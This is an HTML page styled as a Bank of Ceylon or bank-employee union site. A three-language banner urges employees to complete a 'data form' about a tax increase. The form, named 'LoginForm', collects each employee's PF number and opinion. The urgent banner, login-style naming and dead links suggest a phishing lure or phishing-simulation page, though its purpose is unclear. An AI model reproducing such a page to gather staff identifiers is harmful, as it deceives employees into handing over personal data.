<!DOCTYPE html><html lang="en"><head>
	<title>Bank of Ceylon&#39;</title>
	<style>
		/* Dashed red border */
		hr.new2 {
			border: 0.8px solid black;
		}
		@import url('https://fonts.googleapis.com/css2?family=Abhaya+Libre:wght@400;500;600;700;800&display=swap');
		@import url('https://fonts.googleapis.com/css2?family=Abhaya+Libre:wght@400;500;600;700;800&family=Catamaran:wght@100..900&display=swap');
	</style>
<!-- <link href='nav.css' rel='stylesheet' type='text/css'> -->
	<script src="https://cdn.tailwindcss.com"></script>
	<style type="text/css">@keyframes marquee {
            0% { transform: translateX(100%); }
            100% { transform: translateX(-45%); }
        }
        .marquee {
            white-space: nowrap;
            display: inline-block;
            animation: marquee 200s linear infinite;
        }

		.submit {
			cursor: pointer;
		}

		.submit:hover {
  			background-color: rgb(197, 48, 48);
		}

		body {
		margin: 0;
		font-family: Verdana;
		}

		.topnav {
		overflow: hidden;
		background-color: #4470a3;
		/*background-image: url("assets/tower1.jpg");*/
		}

		.topnav a {
		float: right;
		color: #f2f2f2;
		text-align: center;
		padding: 18px 18px;
		text-decoration: none;
		font-size: 18px;
		}

		.topnav a:hover {
		background-color: #ddd;
		color: black;
		}

		.topnav a.active {
		background-color: #04AA6D;
		color: white;
		}



	</style>
</head>
</div>
</div>
</div>
</header>


<div class="topnav">
	<div class="img float-left">
	<img alt="logo" src="./assets/r.png"/>
</div>
<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">Contact Us</a>
	<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">About Us</a>
	<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">Publications</a>
	<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">Updates</a>
	<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">Welfare</a>
	<a class="text-black  text-lg link-16 link-16:hover link-16::before link-16:hover::before" style="font-family:poppins" href="#">Home</a>
	<div class="#4470a3 lg:h-[60%] float-right text-sm overflow-hidden">
		<hr class="new2">
	<p class="text-red-900 text-base font-extrabold marquee ">ලංකා බැංකු සේවකයන්ගේ නව බදු වැඩිවීමට අදාලව සාකච්ඡාව සාර්ථක කර ගැනීම සඳහා සේවක ඔබගේ සහයෝගය අත්‍යවශ්‍ය වේ. අප විසින් ඊට අදාළව ඩිජිටල් දත්ත ගොනුවක් සකස් කර ඇති බැවින්, කරුණාකර පහත දත්ත පෝරමය සම්පූර්ණ කරන්න | இலங்கை வங்கி ஊழியர்களின் புதிய வரி அதிகரிப்பு தொடர்பான கலந்துரையாடலின் வெற்றிக்கு உங்களின் ஒத்துழைப்பு அவசியமானது. இது சம்பந்தமாக டிஜிட்டல் தரவுக் கோப்பை நாங்கள் தயார் செய்துள்ளதால், கீழே உள்ள இணைப்பில் அணுகப்பட்ட தரவுப் படிவத்தைப் பூர்த்தி செய்யவும் | Your cooperation is essential to make the discussion regarding the new tax increase for Bank of Ceylon employees a success. We have prepared a digital data file in this regard, so please complete the data form at the link below.</p>
	</div>

	</div>
</div>

<!-- Body -->
<div class= "bg-[url(&#39;./assets/tower.jpg&#39;)]  bg-no-repeat bg-cover flex flex-col justify-center items-center min-h-screen bg-opacity-50">
    <div class="bg-[#4e7bbfa1] max-w-md w-full rounded-md p-6 flex flex-col justify-center shadow-lg">
        <p class="text-black text-2xl font-bold text-center mb-4" style="font-family:poppins">
            Your Feedback is very<span class="text-red-900">&nbsp;Important!</span>
        </p>

        <form action="/submit.html" autocomplete="off" method="GET" name="LoginForm" class="space-y-4">
            <input class="w-full rounded-md p-3 border border-gray-300" name="UsernameForm" placeholder="Your PF Number" tabindex="1" type="text" required/>
			<textarea class="w-full rounded-md p-3 border border-gray-300" name="UsernameForm" placeholder="Your Feedback" tabindex="1" type="textarea" required rows="4" cols="50"></textarea>
		
			<p class="text-black text-xl font-bold mb-4" style="font-family:poppins">Do you support our cause?</p>
			<div class="text-black text-xl font-bold">
			
				<input type="radio" 
					   id="Yes" 
					   name="Answer" 
					   value="Yes">
				<label for="Yes" style="font-family:poppins" >Yes</label>
				&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
				<input type="radio" 
					   id="No" 
					   name="Answer" 
					   value="No">
				<label for="No" style="font-family:poppins" >No</label>
			</div>
            <input class="submit bg-[#B30000] w-full text-center rounded-md p-3 mt-4 text-white tracking-wide text-lg" style="font-family:poppins" type="submit" value="Submit"/> 
        </form>
    </div>
</div>

<!-- Footer -->
<footer class="grid lg:grid-cols-12">
<div class="lg:col-span-3 bg-black text-white lg:p-0 p-5 leading-1 text-center lg:text-left "> 
	<div><a class="text-sm text-white text-nowrap pb-5  hover:text-red-600" style="font-family:poppins" href="#"> &nbsp;&nbsp;&nbsp;&nbsp;NEWS &amp; UPDATES</a></div>
</div>

<div class="lg:col-span-3 bg-black text-white p-5 leading-8 text-center lg:text-left">
<div><a class="hover:text-red-600 text-sm text-center" style="font-family:poppins" href="#">ABOUT US</a></div>

<div><a class="hover:text-red-600 text-sm" style="font-family:poppins" href="#">OUR STORY &amp; OBJECTIVES</a></div>

<div><a class="hover:text-red-600 text-sm" style="font-family:poppins" href="#">OUR HISTORY &amp; MILESTONES</a></div>

<div><a class="hover:text-red-600 text-sm" style="font-family:poppins" href="#">OUR TEAM</a></div>

<div><a class="hover:text-red-600 text-sm" style="font-family:poppins" href="#">OFFICE BEARERS</a></div>


</div>

<div class="lg:col-span-3 bg-black text-white mt-[-20px] lg:mt-0 lg:p-5 leading-8 text-center lg:text-left">
<div><a class= "hover:text-red-600 text-sm" style="font-family:poppins" href="#">PUBLICATIONS</a></div>

<div><a class= "hover:text-red-600 text-sm" style="font-family:poppins" href="#">DOWNLOADS</a></div>

<div><a class= "hover:text-red-600 text-sm" style="font-family:poppins" href="#">WELFARE</a></div>

<div><a class= "hover:text-red-600 text-sm" style="font-family:poppins" href="#">GALLERY</a></div>

<div><a class= "hover:text-red-600 text-sm" style="font-family:poppins" href="#">ANNOUNCEMENTS AND EVENTS</a></div>

</div>

<div class="lg:col-span-3 bg-black text-white p-5 leading-8 lg:pl-0 text-center lg:text-left">
<div class="text-lg tracking-wide" style="font-family:poppins" >CONTACT US</div>

<div class="text-sm mt-3 lg:mt-5" style="font-family:poppins" > BOC Square, Bank of Ceylon Mawatha, Colombo 01.</div>

<div class="mt-5 leading-6" style="font-family:poppins">
<p>ncbev@sltnet.lk</p>
</div>

<div class="flex gap-2 mt-2 text-center justify-center lg:justify-start"><img alt="facebook" class="w-10 h-10" src="./assets/facebook.png"/> <img alt="youtube" class="w-10 h-10" src="./assets/youtube.png"/></div>
</div>
</footer>
<script defer="">
        const hamburger_icon = document.getElementById('hamburger').addEventListener('click', () => {
            const mobile_nav = document.getElementById('mobilenav');
            mobile_nav.classList.toggle('hidden');
        });
    </script>

</body></html>